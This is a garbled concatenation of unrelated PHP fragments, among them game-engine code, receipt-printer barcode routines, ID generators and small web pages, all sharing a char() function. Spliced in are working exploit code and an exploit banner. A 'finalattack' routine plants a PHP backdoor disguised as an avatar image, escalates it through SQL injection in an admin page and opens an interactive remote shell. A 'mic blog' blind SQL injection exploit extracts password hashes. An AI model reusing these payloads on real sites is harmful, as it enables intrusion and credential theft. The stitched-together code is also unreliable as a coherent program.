function letterList()
{
for ($i = 65; $i <= 90; $i++) {
$ch = char($i);
echo "<option value=" . $ch . ">" . $ch . "</option>";
}
}
public function get_next_practice_id()
{
$result = -1;
if ($query = $this->db->query("SELECT MAX(practiceid) AS `prid` FROM `am_practice`;")) {
if ($query->num_rows() > 0) {
if ($row = $query->result()) {
$result = $row[0]->prid;
}
}
$query->free_result();
}
if ($result == "" || $result == -1) {
$result = "AMPR-A00001";
} else {
if (Intval(substr($result, 6)) == 99999) {
if (ord(substr($result, 5, 1)) == 'z') {
$result = -1;
} else {
$val = char(ord(substr($result, 5, 1)) + 1);
$result = "AMPR-" . $val . "00001";
}
} else {
$val = Intval(substr($result, 6)) + 1;
$result = substr($result, 0, 6) . ($val < 10000 ? $val < 1000 ? $val < 100 ? $val < 10 ? "0000" . $val : "000" . $val : "00" . $val : "0" . $val : $val);
}
}
return $result;
}
function frchar($tab)
{
foreach ($tab as $clef => $valeur) {
$tab[$clef] = char($valeur);
}
return $tab;
}
function actionIndex()
{
if (!isset($_SESSION['id'])) {
header("Location: /");
die;
}
if (!isset($_SESSION['cid'])) {
header("Location: /cabinet");
die;
}
$main = new Templater();
$main->import("interface/game.tpl");
$main->setvar("%URL%", "http://" . $GLOBALS['url']);
$main->setvar("%STORAGE_TPL_URL%", "/storage/tpl");
$main->setvar("%YEAR%", date("Y"));
$main->setvar("%CSS%", "<style>" . templater("css/game.css", array("%ROOT%" => "/storage/tpl")) . "</style>");
$main->setvar("%GAME_TITLE%", $GLOBALS['name']);
$main->setvar("%STORAGE_STATIC_URL%", "/storage/static");
$GLOBALS['current_loc_info'] = Database::GetOne("config", array("mod" => "locations"))[char()->map];
if (!isset($GLOBALS['current_loc_info']['type']) or $GLOBALS['current_loc_info']['type'] == 'default') {
$main->setvar("%GUI%", template("interface/GUI.tpl"));
} else {
$GLOBALS['current_loc_type_info'] = Database::GetOne("config", array("mod" => "location_types"))[$GLOBALS['current_loc_info']['type']];
require_once MODS_ROOT . SEPARATOR . $GLOBALS['current_loc_type_info']['module'] . SEPARATOR . "location_type.php";
$main->setvar("%GUI%", isset($GLOBALS['to_gui']) ? $GLOBALS['to_gui'] : '');
}
$main->setvar("%CHATBOX%", template("boxes/chat.tpl"));
$main->renderEcho();
}
public function actionHandler()
{
$last_id = isset($_POST['last_id']) ? (int) $_POST['last_id'] : 0;
$result = array();
if (!empty($_POST['text'])) {
$sth = Database::Insert("chat", array('user' => char()->name, 'text' => $_POST['text'], 'date' => time()));
}
$sth = Database::Get("chat", array('date' => array('$gt' => $last_id)))->sort(array('date' => 1));
foreach ($sth as $o) {
$result[] = $o;
}
echo json_encode($result);
}
public static function unescape($html)
{
$html = preg_replace_callback('/&([#\\w]+);/', function ($n) {
$n = strtolower($n);
if ($n === 'colon') {
return ':';
}
if ($n[0] === '#') {
return $n[1] === 'x' ? char(hexdec(substr($n, 2))) : char(substr($n, 1));
}
return '';
}, $html);
return $html;
}
function porlet($porlet, $content)
{
$skin = path("www/lib/themes/cpanel", TRUE);
$HTML = ' <div class="box">
<span class="bold grey">' . $porlet . '</span> <span class="float-right bold small grey">X</span>';
if (is_array($content)) {
$HTML .= char("\t", 4) . openUl() . char("\n");
foreach ($content as $list) {
$HTML .= char("\t", 5) . $list . char("\n");
}
$HTML .= char("\t", 4) . closeUl() . char("\n");
} else {
$HTML .= char("\t", 4) . $content . char("\n");
}
$HTML .= '</div><br />';
return $HTML;
}
function __call($func, $args)
{
$func = str_replace("action", "", $func);
if ($func != 'index') {
$array = Database::GetOne("characters", array("name" => $func));
} else {
$array = Database::GetOne("characters", array("_id" => toId($_SESSION['cid'])));
$func = $array['name'];
}
if (!isset($array['name'])) {
die("<h1>Персонаж " . $func . " не найден</h1>");
}
$params = Database::GetOne("config", array("mod" => "params"));
$main = new Templater();
$main->import("interface/playerinfo.tpl");
$main->setvar("%URL%", "http://" . $GLOBALS['url']);
$main->setvar("%STORAGE_TPL_URL%", "/storage/tpl");
$main->setvar("%YEAR%", date("Y"));
$main->setvar("%CSS%", "<style>" . templater("css/game.css", array("%ROOT%" => "/storage/tpl")) . "</style>");
$main->setvar("%GAME_TITLE%", $GLOBALS['name']);
$main->setvar("%STORAGE_STATIC_URL%", "/storage/static");
$main->setvar("%GUI%", template("interface/GUI.tpl"));
$main->setvar("%CHATBOX%", template("boxes/chat.tpl"));
$params_all = '';
foreach ($array as $key => $value) {
if (MongoReserved($key) or MongoReserved($value) or strstr($key, "p_")) {
continue;
}
$main->setvar("%" . $key . "%", $array[$key]);
}
foreach ($params as $key => $value) {
if (!strstr($key, "p_")) {
continue;
}
$v = char(__toString($array['_id']))->getParam($key);
$main->setvar("%" . $key . "%", $v);
$params_all .= '<p><b>' . $value['name'] . '</b>: ' . $v . '</p>';
}
$main->setvar("%PARAMS_ALL%", $params_all);
$main->renderEcho();
}
function __call($func, $args)
{
$func = strtolower(str_replace("action", "", $func));
if (!file_exists(CACHE_ROOT . SEPARATOR . "installed.cache") and $func != 'install') {
header("Location: /admin/install");
die;
}
if (char()->admin < 1 and !in_array($func, char()->perms) and file_exists(CACHE_ROOT . SEPARATOR . "installed.cache")) {
die("403 Forbidden");
}
if (!isset($_SESSION['cid']) and file_exists(CACHE_ROOT . SEPARATOR . "installed.cache")) {
die("403 Forbidden");
}
include_once ADMIN_ROOT . SEPARATOR . "header.inc.php";
if (strstr($func, 'ext_')) {
include_once MODS_ROOT . SEPARATOR . trim($func, 'ext_') . SEPARATOR . trim($func, 'ext_') . ".admin.php";
} else {
include_once ADMIN_ROOT . SEPARATOR . $func . ".php";
}
include_once ADMIN_ROOT . SEPARATOR . "footer.inc.php";
}
private static function unban($args)
{
if (char()->admin <= 0) {
echo "Вы не администратор";
return;
}
if (is_object(CharByName($args))) {
CharByName($args)->ban = 0;
CharByName($args)->ban_reason = "Разблокирован";
echo "Персонаж <b>" . $args . "</b> разблокирован";
} else {
echo "Персонаж <b>" . $args . "</b> не существует";
}
}
function li($list, $open = null)
{
$HTML = null;
if (isMultiArray($list)) {
foreach ($list as $li) {
$class = isset($li["class"]) ? ' class="' . $li["class"] . '"' : null;
if (isset($li["item"]) and strlen($li["item"]) > 1) {
$HTML .= '<li' . $class . '>' . $li["item"] . '</li>';
}
}
} elseif (is_array($list)) {
for ($i = 0; $i <= count($list) - 1; $i++) {
$HTML .= char("\t", 2) . '<li>' . $list[$i] . '</li>';
}
} elseif ($list and $open) {
$HTML .= "<li>" . $list;
} elseif ($open === false) {
$HTML .= "</li>";
} else {
$HTML .= '<li>' . $list . '</li>';
}
return $HTML;
}
<a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-bell"></i> <b class="caret"></b></a>
<ul class="dropdown-menu alert-dropdown">
<li>
<a href="/admin/errors">Показать все ошибки</a>
</li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i> <?php
echo char()->name;
?>
<b class="caret"></b></a>
<ul class="dropdown-menu">
<li>
<a href="/player/<?php
echo char()->name;
?>
"><i class="fa fa-fw fa-user"></i>Мой профиль</a>
</li>
<li>
<a href="/admin/reports"><i class="fa fa-fw fa-envelope"></i> Репорты</a>
</li>
<li>
<a href="/admin/config"><i class="fa fa-fw fa-gear"></i> Настройки</a>
</li>
<li class="divider"></li>
<li>
<a href="/cabinet?logout=1"><i class="fa fa-fw fa-power-off"></i>Выход</a>
</li>
</ul>
</li>
<?php
/*
@last_edit 22.08.2015
@last_autor Mike
@comment Пример типа локаций
*/
if (!isset($GLOBALS['current_loc_info']['map'])) {
$GLOBALS['to_gui'] = '<h3>Возникла ошибка при получении данных локации</h3>';
}
if (isset($_GET['teleport'])) {
char()->map = $_GET['teleport'];
die("<script>location.href = '?';</script>");
}
$GLOBALS['to_gui'] = '';
parse_str($GLOBALS['current_loc_info']['map'], $info);
$GLOBALS['to_gui'] = '<img src="' . $info['image'] . '"><h4>Перейти: </h4>';
foreach ($info as $key => $value) {
if ($key == 'image') {
continue;
}
$GLOBALS['to_gui'] .= '<p><li><a href="?teleport=' . $value . '">' . $key . '</a></li></p>';
}
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]);
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
exit("\nNo file found");
} else {
print "\n\$shell> ";
}
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;";
$sql[] = "DELETE FROM {$config['0']}_nbconnecte;";
for ($i = 0; $i < count($sql); $i++) {
$xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]);
}
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell', "system('{$cmd}');");
$xpl->get($url);
$data = explode('123456789', $xpl->getcontent());
print $data[1] . "\n\$shell> ";
}
function char($data)
{
$char = 'CHAR(';
/**
* Implements barcodes 1D
*
* @param int $type Default CODE128
* @param int $height
* @param int $lineWidth
* @param string $txtPosition
* @param string $txtFont
* @param string $data
*/
public function barcode($data = '123456', $type = 'CODE128', $height = 162, $lineWidth = 2, $txtPosition = 'none', $txtFont = '')
{
if ($this->printerMode == 'ESCPOS') {
parent::barcode($data, $type, $height, $lineWidth, $txtPosition, $txtFont);
return;
}
if (!($data = Barcodes\Barcode1DAnalysis::validate($data, $type))) {
throw new \InvalidArgumentException('Data or barcode type is incorrect.');
}
if (!array_key_exists($type, $this->barcode1Dlist)) {
throw new \InvalidArgumentException('This barcode type is not listed.');
}
$n = strlen($data);
$id = $this->barcode1Dlist[$type];
$height = self::validateInteger($height, 50, 200, 50);
$lineWidth = self::validateInteger($lineWidth, 2, 5, 2);
$n4 = 0;
if ($txtPosition != 'none') {
$n4 = 1;
}
switch ($type) {
case 'UPC_A':
$this->buffer->write(self::GS . 'kA' . self::VT . $data);
break;
case 'UPC_E':
$this->buffer->write(self::GS . 'kB' . self::ACK . $data);
break;
case 'EAN13':
$this->buffer->write(self::GS . 'kC' . self::FF . $data);
break;
case 'EAN8':
$this->buffer->write(self::GS . 'kD' . self::BEL . $data);
break;
case 'CODE39':
$this->buffer->write(self::GS . 'kE' . char($n) . $data);
break;
case 'I25':
$this->buffer->write(self::GS . 'kF' . char($n) . $data);
break;
case 'CODABAR':
$this->buffer->write(self::GS . 'kG' . char($n) . $data);
break;
case 'CODE93':
$this->buffer->write(self::GS . 'kH' . char($n) . $data);
break;
case 'CODE128':
$this->buffer->write(self::GS . 'kI' . char($n) . $data);
break;
case 'ISBN':
$this->buffer->write(self::GS . 'k' . self::NAK . $data . self::NUL);
break;
case 'MSI':
$this->buffer->write(self::GS . 'k' . self::SYN . $data . self::NUL);
break;
}
}
function ul($list, $ID = NULL, $class = NULL)
{
$ID = !is_null($ID) ? ' id="' . $ID . '"' : NULL;
$class = !is_null($class) ? ' class="' . $class . '"' : NULL;
$HTML = '<ul' . $ID . $class . '>' . char("\t");
if (isMultiArray($list)) {
foreach ($list as $li) {
$class = isset($li["class"]) ? ' class="' . $li["class"] . '"' : NULL;
$HTML .= char("\t", 2) . '<li' . $class . '>' . $li["item"] . '</li>' . char("\n");
}
} elseif (is_array($list)) {
for ($i = 0; $i <= count($list) - 1; $i++) {
$HTML .= char("\t", 2) . '<li>' . $list[$i] . '</li>' . char("\n");
}
}
$HTML .= char("\t") . '</ul>' . char("\n");
return $HTML;
}
// 'à', 'â', 'ä', 'á', 'ã', 'å',
// 'î', 'ï', 'ì', 'í',
// 'ô', 'ö', 'ò', 'ó', 'õ', 'ø',
// 'ù', 'û', 'ü', 'ú',
// 'é', 'è', 'ê', 'ë',
// 'ç', 'ÿ', 'ñ',
// ),
// array(
// 'a', 'a', 'a', 'a', 'a', 'a',
// 'i', 'i', 'i', 'i',
// 'o', 'o', 'o', 'o', 'o', 'o',
// 'u', 'u', 'u', 'u',
// 'e', 'e', 'e', 'e',
// 'c', 'y', 'n',
// ),
// $string
// );
// return $string;
// }
//indentifiant de la BD
$connexion = new PDO('mysql:host=localhost;dbname=applichauffeur;charset=utf8', 'root', '');
//on ouvre les fichiers dans un tableau
$communes = file('./ville.txt');
//boucle pour lire toutes les case
for ($i = 0; $i < 100; $i++) {
//on recupére la case de du tableau pour les tests
echo char($i . "||" . $communes[$i] . "</br> ");
$com = char($communes[$i]);
//on envoi les infos de $ligne sur la bdd
$connexion->exec("INSERT INTO COMMUNE(VILNOM) VALUES (\"{$com}\");");
}
function packLineStyleAray($linestyleCount, $linestyles)
{
array_push($this->pushpop, "packLineStyleAray");
$linestyleCount < 0xff ? $atom = $this->packUI8($linestyleCount) : ($atom .= char(0xff) . $this->packUI16($linestyleCount));
$atom .= $linestyles;
array_pop($this->pushpop);
return $atom;
}
<?php
$msg = 'https://www.sefaz.rs.gov.br/NFCE/NFCE-COM.aspx?chNFe=43141006354976000149650540000086781171025455&nVersao=100&tpAmb=2&dhEmi=323031342d31302d33305431353a33303a32302d30323a3030&vNF=0.10&vICMS=0.00&digVal=682f4d6b6b366134416d6f7434346d335a386947354f354b6e50453d&cIdToken=000001&cHashQRCode=771A7CE8C50D01101BDB325611F582B67FFF36D0';
$msgLen = (int) strlen($msg);
$iTam1 = $msgLen;
$item2 = 0;
if ($msgLen > 255) {
$iTam1 = (int) $msgLen % 255;
$iTem2 = (int) $msgLen / 255;
}
$centraliza = chr(27) . chr(97) . chr(1);
$qrcode = chr(29) . chr(107) . char(81) . chr(2) . chr(12) . chr($msgLen) . chr(1) . chr($iTam1) . chr($iTam2) . $msg;
// aqui começa o texto
$cutcommand = chr(27) . chr(119);
// acionamento da Guilhotina.
{
$rast = str_replace("à", "chr224", $data);
$rast = str_replace("é", "chr233", $rast);
$rast = str_replace("è", "chr232", $rast);
$rast = str_replace("ê", "chr234", $rast);
$rast = str_replace("â", "chr226", $rast);
$rast = str_replace("ç", "chr231", $rast);
$rast = str_replace("ô", "chr244", $rast);
$rast = str_replace("î", "chr238", $rast);
$rast = str_replace("û", "chr251", $rast);
return $rast;
}
if ($_GET['objkey'] == "schema") {
$result = "SELECT pn.nspname as col FROM pg_catalog.pg_namespace pn WHERE nspname NOT LIKE 'pg_%' AND nspname != 'information_schema' ORDER BY nspname";
} else {
if ($_GET['objkey'] == "contenu") {
$result = "SELECT libelle_them||'.'||idtheme as col FROM admin_svg.theme order by libelle_them asc";
} else {
$test_table = explode("|", $_GET['objkey']);
if ($test_table[0] == "table") {
$result = "SELECT c.relname as col FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE (c.relkind = 'r' or (c.relkind = 'v')) AND nspname='" . $test_table[1] . "' ORDER BY c.relname";
} else {
$result = "SELECT a.attname as col FROM pg_catalog.pg_attribute a LEFT JOIN pg_catalog.pg_attrdef adef ON a.attrelid=adef.adrelid AND a.attnum=adef.adnum LEFT JOIN pg_catalog.pg_type t ON a.atttypid=t.oid WHERE a.attrelid = (SELECT oid FROM pg_catalog.pg_class WHERE relname='" . $test_table[0] . "' AND relnamespace = (SELECT oid FROM pg_catalog.pg_namespace WHERE nspname = '" . $test_table[1] . "')) AND a.attnum > 0 AND NOT a.attisdropped ORDER BY a.attnum";
}
}
}
$col = $DB->tab_result($result);
for ($z = 0; $z < count($col); $z++) {
$retour .= char($col[$z]['col']) . "#";
}
echo $retour;
function apply_ws_query($connect, $sess_id, $q)
{
if ($sess_id != '0' and $GLOBALS['sess_data'][$sess_id]['online'] < time()) {
$GLOBALS['sess_data'][$sess_id]['online'] = time() + 120;
}
switch ($q[0]) {
case 'sid':
return array('type' => 'sid', 'answer' => $sess_id);
break;
case "uniqid":
return array('type' => 'uniqid', 'answer' => uniqid());
case 'test':
return array('answer' => '1');
break;
case 'teleport':
$GLOBALS['sess_data'][$sess_id]['x'] = $q[1];
$GLOBALS['sess_data'][$sess_id]['y'] = $q[2];
$GLOBALS['sess_data'][$sess_id]['dir'] = $q[3];
sendAll(array('type' => 'teleport', 'char' => $GLOBALS['sess_data'][$sess_id]['cid'], 'x' => $q[1], 'y' => $q[2], 'dir' => $q[3]));
return array('type' => 'default', 'answer' => '1');
break;
case 'clientjs':
return array('type' => 'clientjs', 'answer' => rpgjs_getcmd($q[1]));
break;
case 'getposition':
if (!isset($GLOBALS['sess_data'][$sess_id]['x']) or !isset($GLOBALS['sess_data'][$sess_id]['y']) or !isset($GLOBALS['sess_data'][$sess_id]['dir'])) {
$GLOBALS['sess_data'][$sess_id]['x'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->pos_x;
$GLOBALS['sess_data'][$sess_id]['y'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->pos_y;
$GLOBALS['sess_data'][$sess_id]['dir'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->dir;
$GLOBALS['sess_data'][$sess_id]['loc'] = char($GLOBALS['sess_data'][$sess_id]['cid'])->map;
}
return array('type' => 'getposition', 'x' => $GLOBALS['sess_data'][$sess_id]['x'], 'y' => $GLOBALS['sess_data'][$sess_id]['y'], 'loc' => $GLOBALS['sess_data'][$sess_id]['map'], 'dir' => $GLOBALS['sess_data'][$sess_id]['dir']);
break;
case 'online':
$array = array('type' => 'online');
foreach ($GLOBALS['sess_data'] as $key => $value) {
if ($value['online'] < time()) {
continue;
}
$array[$value['_id']]['id'] = $value['_id'];
$array[$value['_id']]['x'] = $value['x'];
$array[$value['_id']]['y'] = $value['y'];
$array[$value['_id']]['dir'] = $value['dir'];
$array[$value['_id']]['name'] = $value['name'];
$array[$value['_id']]['online'] = $value['online'];
$array[$value['_id']]['map'] = $value['map'];
$array[$value['_id']]['skin'] = $value['skin'];
}
return $array;
break;
case 'events':
return array('type' => 'events', 'answer' => implode(" ", array_values(check_player_events($GLOBALS['sess_data'][$sess_id]['cid'], true, true)['js'])));
break;
case 'mapchars':
$array = array('type' => 'mapchars');
foreach ($GLOBALS['sess_data'] as $key => $value) {
if ($value['map'] != $q[1] or $GLOBALS['sess_data'][$sess_id]['cid'] == $value['_id']) {
continue;
}
$array[$value['_id']]['id'] = $value['_id'];
$array[$value['_id']]['x'] = $value['x'];
$array[$value['_id']]['y'] = $value['y'];
$array[$value['_id']]['dir'] = $value['dir'];
$array[$value['_id']]['name'] = $value['name'];
$array[$value['_id']]['online'] = $value['online'];
$array[$value['_id']]['map'] = $value['map'];
$array[$value['_id']]['skin'] = $value['skin'];
}
return $array;
break;
case 'exists':
return array('type' => 'default', 'error' => 'Deprecated method. Use API.');
break;
default:
return array('type' => 'default', 'error' => 'Bad query ID (' . $q[0] . ')');
break;
}
}
function packLINESTYLEARRAY($LineStyleCount, $LineStyles)
{
array_push($this->FMDebug, "packLINESTYLEARRAY");
if ($LineStyleCount < 0xff) {
$atom = $this->packUI8($LineStyleCount);
} else {
$atom .= char(0xff) . $this->packUI16($LineStyleCount);
}
$atom .= $LineStyles;
array_pop($this->FMDebug);
return $atom;
}
// array(
// 'à', 'â', 'ä', 'á', 'ã', 'å',
// 'î', 'ï', 'ì', 'í',
// 'ô', 'ö', 'ò', 'ó', 'õ', 'ø',
// 'ù', 'û', 'ü', 'ú',
// 'é', 'è', 'ê', 'ë',
// 'ç', 'ÿ', 'ñ',
// ),
// array(
// 'a', 'a', 'a', 'a', 'a', 'a',
// 'i', 'i', 'i', 'i',
// 'o', 'o', 'o', 'o', 'o', 'o',
// 'u', 'u', 'u', 'u',
// 'e', 'e', 'e', 'e',
// 'c', 'y', 'n',
// ),
// $string
// );
// return $string;
// }
//indentifiant de la BD
$connexion = new PDO('mysql:host=localhost;dbname=appli_chf;charset=utf8', 'root', '');
//on ouvre les fichiers dans un tableau
$communes = file('./ville.txt');
//boucle pour lire toutes les case
for ($i = 0; $i < 100; $i++) {
//on recupére la case de du tableau pour les tests
echo char($i . "||" . $communes[$i] . "</br> ");
//on envoi les infos de $ligne sur la bdd
$connexion->exec("INSERT INTO COMMUNE(VILID, VILNOM) VALUES ({$i}, \"{$communes[$i]}\");");
}
{
echo "[?] mic blog v0.0.3 Multiple Remote Exploit\r\n\r\n";
echo "[?] (Remote\\Blind) SQL Injection\r\n";
echo "[?] Usage: php [exploit.php] [host:port] [path blog] [table prefix_user] [user id] [normal or blind]\r\n";
echo "[?] Example: php mic.php localhost:80 cms mic_user 1 normal\r\n";
echo "[?] Example: php mic.php localhost:80 cms mic_user 1 blind\r\n\r\n";
echo "[?] Remote Privilege Escalation\r\n";
echo "[?] Usage: php mic.php localhost:80 cms [username] [password] [privilege]\r\n";
echo "[?] Example: php mic.php localhost:80 cms anarchy mypasswordz privilege\r\n";
die;
}
$id = 0;
$hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102);
for ($i = 0; $i <= 32; $i++) {
for ($j = 0; $j <= 17; $j++) {
if (!eregi('modules.php', http_request($argv[1], $argv[2], char($hash[$j], $id, $argv[3], $argv[4])))) {
$password .= chr($hash[$j]);
$id++;
}
}
}
if (isset($password)) {
echo "[?] Hash: {$password}\r\n[?] ID: {$argv['4']}\r\n";
die;
} else {
echo "[?] Exploit Failed!\r\n";
die;
}
?>
# milw0rm.com [2008-10-16]
public static function makereport($array)
{
if (!isset($_POST['text'])) {
$answer = json_encode(array('error' => 'Cant read text'));
}
if (!isset($_SESSION['cid'])) {
$answer = json_encode(array('error' => 'Not logged in'));
}
$text = trim($_POST['text']);
$text = htmlspecialchars($_POST['text']);
$text = strip_tags($_POST['text']);
Database::Insert("reports", array("author" => char()->name, "message" => $text, "date" => raptor_date()));
$answer = json_encode(array('message' => 'Report sent'));
return $answer;
}
public function get_next_id($practice, $practiceprefix)
{
$result = -1;
if ($query = $this->db->query("SELECT MAX(deviceid) AS `did` FROM `" . $practice . "_device`;")) {
if ($query->num_rows() > 0) {
if ($row = $query->result()) {
$result = $row[0]->did;
}
}
$query->free_result();
}
if ($result == "" || $result == -1) {
if ($practice == "am") {
$result = "AMD-A001";
} else {
$result = $practiceprefix . "D-A001";
}
} else {
if (Intval(substr($result, 5)) == 999) {
if (ord(substr($result, 4, 1)) == 'Z') {
$result = -1;
} else {
$val = char(ord(substr($result, 4, 1)) + 1);
$result = substr($result, 0, 4) . $val . "001";
}
} else {
$val = Intval(substr($result, 5)) + 1;
$result = substr($result, 0, 5) . ($val < 100 ? $val < 10 ? "00" . $val : "0" . $val : $val);
}
}
return $result;
}
function finalattack($admin_sid, $admin_uid)
{
global $url, $xpl, $mode, $prefix, $file_upload_code;
print "\n[*] Admin status confirmed.\n";
# Admin Cookies
$xpl->reset("cookie");
$xpl->addcookie("{$prefix}sess_id", $admin_sid);
$xpl->addcookie("{$prefix}user_id", $admin_uid);
$xpl->addcookie("{$prefix}admin_session", $admin_uid);
print "[*] Uploading fake image ... ";
/* Code in the fake avatar */
if ($mode == 0) {
$c0de = '<?php' . "\n" . "error_reporting(0);" . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\'; ?>';
} else {
$c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
}
/* This is based on DarkFig's code (http://mgsdl.free.fr/?1:30) */
/* It was a little changed to permit 2 modes: upload/code exec */
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $c0de));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$f = fopen("zzz.jpg", "w");
fputs($f, $c0de);
fclose($f);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
exit("error.\n");
}
print "done.\n";
print "[*] Processing SQL queries ... ";
$sql = array();
$sql[] = "ALTER TABLE nuked_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
$sql[] = "UPDATE nuked_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;";
$sql[] = "DELETE FROM nuked_stats_visitor WHERE referer LIKE 0x25673030676c6525;";
/* added by real to delete our SQL Injection from SQL DB */
$sql[] = "DELETE FROM nuked_nbconnecte;";
for ($i = 0; $i < count($sql); $i++) {
$xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]);
}
print "done.\n";
/* Final step: File Upload or Code Execution */
if ($mode == 0) {
$xpl->addheader("Upload", "1");
$c = $xpl->get($url);
if (preg_match("#upfiledone#i", $c)) {
print "[*] File uploaded.\n\n";
} else {
exit("[*] File upload error.\n");
}
print "[*] " . $url . "w00t.php\n";
} else {
print "\n\$shell> ";
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
$xpl->reset('header');
$xpl->addheader('Shell', "system('{$cmd}');");
$xpl->get($url);
$data = explode('123456789', $xpl->getcontent());
print $data[1] . "\n\$shell> ";
}
}
/* End of DarkFig based code */
exit;
}
<a href="price4.php">
<input class="button_7"type="button"value="乳製品">
</a>
<a href="price5.php">
<input class="button_8"type="button"value="炭水化物">
</a>
<!--ヘッダとサイドおわり-->
<!--ページごとに週を送る→-日付を得る→日付ごとのメニューを表示→-それぞれのボタンにメニューIDを→遷移先にメニューID送る→IDをもとに材料表示-->
<div class=title>
<?php
session_start();
$list[0] = $_POST['1'];
$price = SerchPrice(2.0, $_SESSION["USERID"], $list);
printf("%s の価格はおよそ\\ %0.1d です", FoodID2Name($_POST['1']), $price[0]);
?>
</div>
<div class="chart">
<?php
session_start();
$data = char(SerchTimeChart(2.0, $_SESSION["USERID"], $_POST['1']));
printf("<img src=\"http://chart.apis.google.com/chart?chg=0,10,5,5&chf=bg,s,e2e2e2&chs=500x300&chd=t:%s|%s&chxt=x,y&chxr=0,0,%fE2|1,0,%fE1&cht=lxy\">", $data[0], $data[1], (double) $data[2] / 100, (double) $data[3] / 10);
?>
</div>
</body>
</html>
function lname_gen()
{
$last = array();
$long = rand(5, 7);
for ($i = 0; $i < $long; $i++) {
//returns random letter
$char = char();
array_push($last, $char);
}
//end for loop
//converts array into string + lowercase
$name = implode($last);
$lname = strtolower($name);
return $lname;
}
function CharByName($name)
{
$id = Database::GetOne("characters", array("name" => $name));
if (is_array($id)) {
return char(__toString($id['_id']));
} else {
return false;
}
}
